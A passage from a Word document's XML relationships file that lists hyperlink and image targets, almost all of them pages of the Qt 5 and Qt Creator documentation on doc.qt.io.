Id="rId2330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId2775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId2982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtwebview-index.html" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-resources.html" TargetMode="External"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-axissetting.html" TargetMode="External"/><Relationship Id="rId954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-georectangle.html" TargetMode="External"/><Relationship Id="rId1377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-thresholdmask.html" TargetMode="External"/><Relationship Id="rId1584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-cppextensionpoints.html" TargetMode="External"/><Relationship Id="rId1791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId2428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2842" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-desaturate.html" TargetMode="External"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-directionalblur.html" TargetMode="External"/><Relationship Id="rId814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-categoryaxis.html" TargetMode="External"/><Relationship Id="rId1237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-rendertargetoutput.html" TargetMode="External"/><Relationship Id="rId1444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-waylandoutput.html" TargetMode="External"/><Relationship Id="rId1651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId1889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-topic.html" TargetMode="External"/><Relationship Id="rId2067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId2481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlexampletoggleswitch.html" TargetMode="External"/><Relationship Id="rId2702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/09-qdoc-commands-includingimages.html" TargetMode="External"/><Relationship Id="rId660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-dithering.html" TargetMode="External"/><Relationship Id="rId1083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-menu.html" TargetMode="External"/><Relationship Id="rId1290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-slider.html" TargetMode="External"/><Relationship Id="rId1304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-splitview.html" TargetMode="External"/><Relationship Id="rId1511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qtobject.html" TargetMode="External"/><Relationship Id="rId1749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId2993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtaudioengine-qmlmodule.html" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-expressions.html" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-blend.html" TargetMode="External"/><Relationship Id="rId965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathelement.html" TargetMode="External"/><Relationship Id="rId1388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-toolbarstyle.html" TargetMode="External"/><Relationship Id="rId1595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qttest-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-closeevent.html" TargetMode="External"/><Relationship Id="rId1816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcoreapplication.html" TargetMode="External"/><Relationship Id="rId2439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-states.html" TargetMode="External"/><Relationship Id="rId2646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/sql-model.html" TargetMode="External"/><Relationship Id="rId2853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmake-manual.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" TargetMode="External"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-circulargaugestyle.html" TargetMode="External"/><Relationship Id="rId1248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-routemaneuver.html" TargetMode="External"/><Relationship Id="rId1455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webengineloadrequest.html" TargetMode="External"/><Relationship Id="rId1662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsql-attribution-sqlite.html" TargetMode="External"/><Relationship Id="rId2078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-index.html" TargetMode="External"/><Relationship Id="rId2285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animation.html" TargetMode="External"/><Relationship Id="rId2506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentanimation.html" TargetMode="External"/><Relationship Id="rId3031" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-quick-tour.html" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-itemmodelbardataproxy.html" TargetMode="External"/><Relationship Id="rId1094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-menuseparator.html" TargetMode="External"/><Relationship Id="rId1108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtnfc-ndeffilter.html" TargetMode="External"/><Relationship Id="rId1315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-stackviewdelegate.html" TargetMode="External"/><Relationship Id="rId1967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId2145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId2713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-cppextensionpoints.html" TargetMode="External"/><Relationship Id="rId2920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-size.html" TargetMode="External"/><Relationship Id="rId671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-brightnesscontrast.html" TargetMode="External"/><Relationship Id="rId976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-hboxplotmodelmapper.html" TargetMode="External"/><Relationship Id="rId1399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-styles-tracecanvas.html" TargetMode="External"/><Relationship Id="rId2352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-textfield.html" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId1161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-phongmaterial.html" TargetMode="External"/><Relationship Id="rId1259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-scatterseries.html" TargetMode="External"/><Relationship Id="rId1466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-calendar-weeknumbercolumn.html" TargetMode="External"/><Relationship Id="rId2005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-colorize.html" TargetMode="External"/><Relationship Id="rId1021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-key.html" TargetMode="External"/><Relationship Id="rId1119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-normaldiffusemapmaterial.html" TargetMode="External"/><Relationship Id="rId1673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-attractor.html" TargetMode="External"/><Relationship Id="rId1978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/spriteenginegraph.png" TargetMode="External"/><Relationship Id="rId2724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId2931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaproperty.html" TargetMode="External"/><Relationship Id="rId903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-drawer.html" TargetMode="External"/><Relationship Id="rId1326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-statusindicatorstyle.html" TargetMode="External"/><Relationship Id="rId1533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlparserstatus.html" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-abstractactioninput.html" TargetMode="External"/><Relationship Id="rId2167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId2374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-applicationwindow.html" TargetMode="External"/><Relationship Id="rId760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-blendequationarguments.html" TargetMode="External"/><Relationship Id="rId998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-inputmethod.html" TargetMode="External"/><Relationship Id="rId1183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-point.html" TargetMode="External"/><Relationship Id="rId1390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-toolbutton.html" TargetMode="External"/><Relationship Id="rId2027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-openglunderqml-example.html" TargetMode="External"/><Relationship Id="rId2234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId2679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickpainteditem.html" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-hostenvironment.html" TargetMode="External"/><Relationship Id="rId858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-contextmenurequest.html" TargetMode="External"/><Relationship Id="rId1043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-light.html" TargetMode="External"/><Relationship Id="rId1488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/index.html" TargetMode="External"/><Relationship Id="rId2746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-basictypes.html" TargetMode="External"/><Relationship Id="rId2953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/quick-projects.html" TargetMode="External"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qurl.html" TargetMode="External"/><Relationship Id="rId718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-ambientlightreading.html" TargetMode="External"/><Relationship Id="rId925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-finalstate.html" TargetMode="External"/><Relationship Id="rId1250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-routequery.html" TargetMode="External"/><Relationship Id="rId1348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-tab.html" TargetMode="External"/><Relationship Id="rId1555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-dynamicobjectcreation.html" TargetMode="External"/><Relationship Id="rId1762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId1110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtnfc-ndefrecord.html" TargetMode="External"/><Relationship Id="rId1208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-qtmultimedia.html" TargetMode="External"/><Relationship Id="rId1415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-turbulence.html" TargetMode="External"/><Relationship Id="rId2813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickpainteditem.html" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-resources.html" TargetMode="External"/><Relationship Id="rId1622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId2091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-textureinthread-example.html" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId3002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-deployment.html" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-rect.html" TargetMode="External"/><Relationship Id="rId368" 